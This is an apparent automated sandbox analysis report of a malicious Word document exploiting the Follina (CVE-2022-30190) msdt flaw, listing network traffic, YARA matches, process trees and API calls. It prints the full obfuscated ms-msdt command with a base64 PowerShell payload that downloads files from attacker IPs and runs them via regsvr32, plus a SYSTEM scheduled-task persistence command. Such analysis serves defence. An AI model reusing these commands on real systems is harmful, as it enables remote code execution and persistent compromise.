                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://tasks.office.com
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://web.microsoftstream.com/video/
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://webshell.suite.office.com
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://wus2.contentsync.
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://wus2.pagecontentsync.
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
                            Source: DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drString found in binary or memory: https://www.odwebp.svc.ms
                            Source: global trafficHTTP traffic detected: GET /123.RES HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)Accept-Encoding: gzip, deflateHost: 185.234.247.119Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /123.RES HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)Accept-Encoding: gzip, deflateHost: 185.234.247.119If-Modified-Since: Fri, 03 Jun 2022 10:07:25 GMTIf-None-Match: "6299dd5d-1861"Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /972639944.dat HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: 185.234.247.119Connection: Keep-Alive
                            Source: 00000007.00000002.710859302.00000000032B0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-06-02
                            Source: 00000007.00000002.711008375.0000000003308000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-06-02
                            Source: 00000007.00000002.710962250.0000000003300000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-06-02
                            Source: 00000007.00000002.712552314.0000000003600000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-06-02
                            Source: Process Memory Space: msdt.exe PID: 2984, type: MEMORYSTRMatched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-06-02
                            Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\89DF4BAA.htm, type: DROPPEDMatched rule: MAL_Msdt_MSProtocolURI_May22 date = 2022-05-30, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-05-31, hash = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784
                            Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\123[1].RES, type: DROPPEDMatched rule: MAL_Msdt_MSProtocolURI_May22 date = 2022-05-30, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-05-31, hash = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784
                            Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\16E37148.htm, type: DROPPEDMatched rule: MAL_Msdt_MSProtocolURI_May22 date = 2022-05-30, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-05-31, hash = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 27_2_049A298827_2_049A2988
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 27_2_049A358D27_2_049A358D
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 27_2_049A824027_2_049A8240
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 27_2_049A670F27_2_049A670F
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 27_2_049A635027_2_049A6350
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 28_2_042B298828_2_042B2988
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 28_2_042B358D28_2_042B358D
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 28_2_042B824028_2_042B8240
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 28_2_042B670F28_2_042B670F
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 28_2_042B635028_2_042B6350
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 28_2_008258CA28_2_008258CA
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 28_2_008258D428_2_008258D4
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 28_2_00822B1128_2_00822B11
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 28_2_008277C428_2_008277C4
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 28_2_00821F0C28_2_00821F0C
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 29_2_04B0298829_2_04B02988
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 29_2_04B0358D29_2_04B0358D
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 29_2_04B0824029_2_04B08240
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 29_2_04B0670F29_2_04B0670F
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 29_2_04B0635029_2_04B06350
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 29_2_04AB77C429_2_04AB77C4
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 29_2_04AB1F0C29_2_04AB1F0C
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 29_2_04AB58CA29_2_04AB58CA
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 29_2_04AB58D429_2_04AB58D4
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 29_2_04AB2B1129_2_04AB2B11
                            Source: C:\Windows\SysWOW64\explorer.exeCode function: 32_2_02F9824032_2_02F98240
                            Source: C:\Windows\SysWOW64\explorer.exeCode function: 32_2_02F9635032_2_02F96350
                            Source: C:\Windows\SysWOW64\explorer.exeCode function: 32_2_02F9670F32_2_02F9670F
                            Source: C:\Windows\SysWOW64\explorer.exeCode function: 32_2_02F9298832_2_02F92988
                            Source: C:\Windows\SysWOW64\explorer.exeCode function: 32_2_02F9358D32_2_02F9358D
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 27_2_0499D447 NtCreateSection,DefWindowProcW,RegisterClassExA,CreateWindowExA,DestroyWindow,UnregisterClassA,NtMapViewOfSection,NtMapViewOfSection,VirtualAllocEx,WriteProcessMemory,lstrlenW,NtUnmapViewOfSection,NtClose,27_2_0499D447
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 27_2_0499D959 GetThreadContext,NtProtectVirtualMemory,NtWriteVirtualMemory,NtProtectVirtualMemory,27_2_0499D959
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 28_2_042AD447 NtCreateSection,DefWindowProcW,RegisterClassExA,CreateWindowExA,DestroyWindow,UnregisterClassA,NtMapViewOfSection,NtMapViewOfSection,VirtualAllocEx,WriteProcessMemory,lstrlenW,NtUnmapViewOfSection,NtClose,28_2_042AD447
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 28_2_042AD959 GetThreadContext,NtProtectVirtualMemory,NtWriteVirtualMemory,NtProtectVirtualMemory,28_2_042AD959
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 29_2_04AFD447 NtCreateSection,DefWindowProcW,RegisterClassExA,CreateWindowExA,DestroyWindow,UnregisterClassA,NtMapViewOfSection,NtMapViewOfSection,VirtualAllocEx,WriteProcessMemory,lstrlenW,NtUnmapViewOfSection,NtClose,29_2_04AFD447
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 29_2_04AFD959 GetThreadContext,NtProtectVirtualMemory,NtWriteVirtualMemory,NtProtectVirtualMemory,29_2_04AFD959
                            Source: DiagPackage.dll.mui.7.drStatic PE information: No import functions for PE file found
                            Source: DiagPackage.dll.7.drStatic PE information: No import functions for PE file found
                            Source: DiagPackage.dll.7.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                            Source: DiagPackage.dll.7.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                            Source: DiagPackage.dll.7.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXESection loaded: sfc.dllJump to behavior
                            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
                            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: jr3.dllJump to behavior
                            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
                            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: jr3.dllJump to behavior
                            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
                            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: jr3.dllJump to behavior
                            Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dll
                            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dll
                            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: jr3.dll
                            Source: doc782.docxVirustotal: Detection: 28%
                            Source: doc782.docxReversingLabs: Detection: 17%
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
                            Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\msdt.exe C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'Unicode.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'JABwACAAPQAgACQARQBuAHYAOgB0AGUAbQBwADsAaQB3AHIAIABoAHQAdABwADoALwAvADEAMAA0AC4AMwA2AC4AMgAyADkALgAxADMAOQAvACQAKAByAGEAbgBkAG8AbQApAC4AZABhAHQAIAAtAE8AdQB0AEYAaQBsAGUAIAAkAHAAXAB0AC4AQQA7AGkAdwByACAAaAB0AHQAcAA6AC8ALwA4ADUALgAyADMAOQAuADUANQAuADIAMgA4AC8AJAAoAHIAYQBuAGQAbwBtACkALgBkAGEAdAAgAC0ATwB1AHQARgBpAGwAZQAgACQAcABcAHQAMQAuAEEAOwBpAHcAcgAgAGgAdAB0AHAAOgAvAC8AMQA4ADUALgAyADMANAAuADIANAA3AC4AMQAxADkALwAkACgAcgBhAG4AZABvAG0AKQAuAGQAYQB0ACAALQBPAHUAdABGAGkAbABlACAAJABwAFwAdAAyAC4AQQA7AHIAZQBnAHMAdgByADMAMgAgACQAcABcAHQALgBBADsAcgBlAGcAcwB2AHIAMwAyACAAJABwAFwAdAAxAC4AQQA7AHIAZQBnAHMAdgByADMAMgAgACQAcABcAHQAMgAuAEEA'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe
                            Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\asaommz3\asaommz3.cmdline
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2969.tmp" "c:\Users\user\AppData\Local\Temp\asaommz3\CSCAF22E0F83F3247E8BD8B234DB9985444.TMP"
                            Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\i3ghm531\i3ghm531.cmdline
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4732.tmp" "c:\Users\user\AppData\Local\Temp\i3ghm531\CSCC6D89D5E8D544281B069B8814BE4D14E.TMP"
                            Source: unknownProcess created: C:\Windows\SysWOW64\regsvr32.exe "C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp\t.A
                            Source: unknownProcess created: C:\Windows\SysWOW64\regsvr32.exe "C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp\t1.A
                            Source: unknownProcess created: C:\Windows\SysWOW64\regsvr32.exe "C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp\t2.A
                            Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\01rkp2ka\01rkp2ka.cmdline
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES1B1C.tmp" "c:\Users\user\AppData\Local\Temp\01rkp2ka\CSC332C869B68444DFCA3A2C61AAABD180.TMP"
                            Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                            Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                            Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                            Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\system32\schtasks.exe" /Create /RU "NT AUTHORITY\SYSTEM" /tn swyghewz /tr "regsvr32.exe -s \"C:\Users\user\AppData\Local\Temp\t1.A\"" /SC ONCE /Z /ST 19:54 /ET 20:06
                            Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: unknownProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe -s "C:\Users\user\AppData\Local\Temp\t1.A"
                            Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s "C:\Users\user\AppData\Local\Temp\t1.A"
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exeJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exeJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\msdt.exe C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'Unicode.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'JABwACAAPQAgACQARQBuAHYAOgB0AGUAbQBwADsAaQB3AHIAIABoAHQAdABwADoALwAvADEAMAA0AC4AMwA2AC4AMgAyADkALgAxADMAOQAvACQAKAByAGEAbgBkAG8AbQApAC4AZABhAHQAIAAtAE8AdQB0AEYAaQBsAGUAIAAkAHAAXAB0AC4AQQA7AGkAdwByACAAaAB0AHQAcAA6AC8ALwA4ADUALgAyADMAOQAuADUANQAuADIAMgA4AC8AJAAoAHIAYQBuAGQAbwBtACkALgBkAGEAdAAgAC0ATwB1AHQARgBpAGwAZQAgACQAcABcAHQAMQAuAEEAOwBpAHcAcgAgAGgAdAB0AHAAOgAvAC8AMQA4ADUALgAyADMANAAuADIANAA3AC4AMQAxADkALwAkACgAcgBhAG4AZABvAG0AKQAuAGQAYQB0ACAALQBPAHUAdABGAGkAbABlACAAJABwAFwAdAAyAC4AQQA7AHIAZQBnAHMAdgByADMAMgAgACQAcABcAHQALgBBADsAcgBlAGcAcwB2AHIAMwAyACAAJABwAFwAdAAxAC4AQQA7AHIAZQBnAHMAdgByADMAMgAgACQAcABcAHQAMgAuAEEA'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exeJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2969.tmp" "c:\Users\user\AppData\Local\Temp\asaommz3\CSCAF22E0F83F3247E8BD8B234DB9985444.TMP"Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4732.tmp" "c:\Users\user\AppData\Local\Temp\i3ghm531\CSCC6D89D5E8D544281B069B8814BE4D14E.TMP"Jump to behavior
                            Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
                            Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
                            Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES1B1C.tmp" "c:\Users\user\AppData\Local\Temp\01rkp2ka\CSC332C869B68444DFCA3A2C61AAABD180.TMP"Jump to behavior
                            Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\system32\schtasks.exe" /Create /RU "NT AUTHORITY\SYSTEM" /tn swyghewz /tr "regsvr32.exe -s \"C:\Users\user\AppData\Local\Temp\t1.A\"" /SC ONCE /Z /ST 19:54 /ET 20:06Jump to behavior
                            Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s "C:\Users\user\AppData\Local\Temp\t1.A"
                            Source: C:\Windows\SysWOW64\msdt.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{88d96a05-f192-11d4-a65f-0040963251e5}\InProcServer32Jump to behavior
                            Source: doc782.LNK.0.drLNK file: ..\..\..\..\..\Desktop\doc782.docx
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.WordJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\{F7EB1FF3-EBC0-4416-8F4D-8BB97AA1D04B} - OProcSessId.datJump to behavior
                            Source: classification engineClassification label: mal100.troj.expl.evad.winDOCX@31/32@0/2
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 27_2_0499E400 CoInitializeEx,CoInitializeSecurity,CoCreateInstance,SysAllocString,CoSetProxyBlanket,27_2_0499E400
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
                            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_USERS.DEFAULT\Software\Borland\Delphi\Locales
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dllJump to behavior
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 27_2_0499B96A CreateToolhelp32Snapshot,Process32First,Process32Next,FindCloseChangeNotification,27_2_0499B96A
                            Source: C:\Windows\SysWOW64\explorer.exeMutant created: \Sessions\1\BaseNamedObjects\{B70640EC-1F2A-4D99-888E-C770DEC0899F}
                            Source: C:\Windows\SysWOW64\explorer.exeMutant created: \Sessions\1\BaseNamedObjects\{536EBBDF-F89D-4065-AD6A-DA847C33EC3A}
                            Source: C:\Windows\SysWOW64\explorer.exeMutant created: \Sessions\1\BaseNamedObjects\Global\{536EBBDF-F89D-4065-AD6A-DA847C33EC3A}
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1548:120:WilError_01
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile written: C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.iniJump to behavior
                            Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe
                            Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe
                            Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe
                            Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exeJump to behavior
                            Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exeJump to behavior
                            Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exeJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                            Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
                            Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
                            Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
                            Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
                            Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
                            Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
                            Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
                            Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
                            Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
                            Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
                            Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
                            Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
                            Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
                            Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
                            Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
                            Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
                            Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
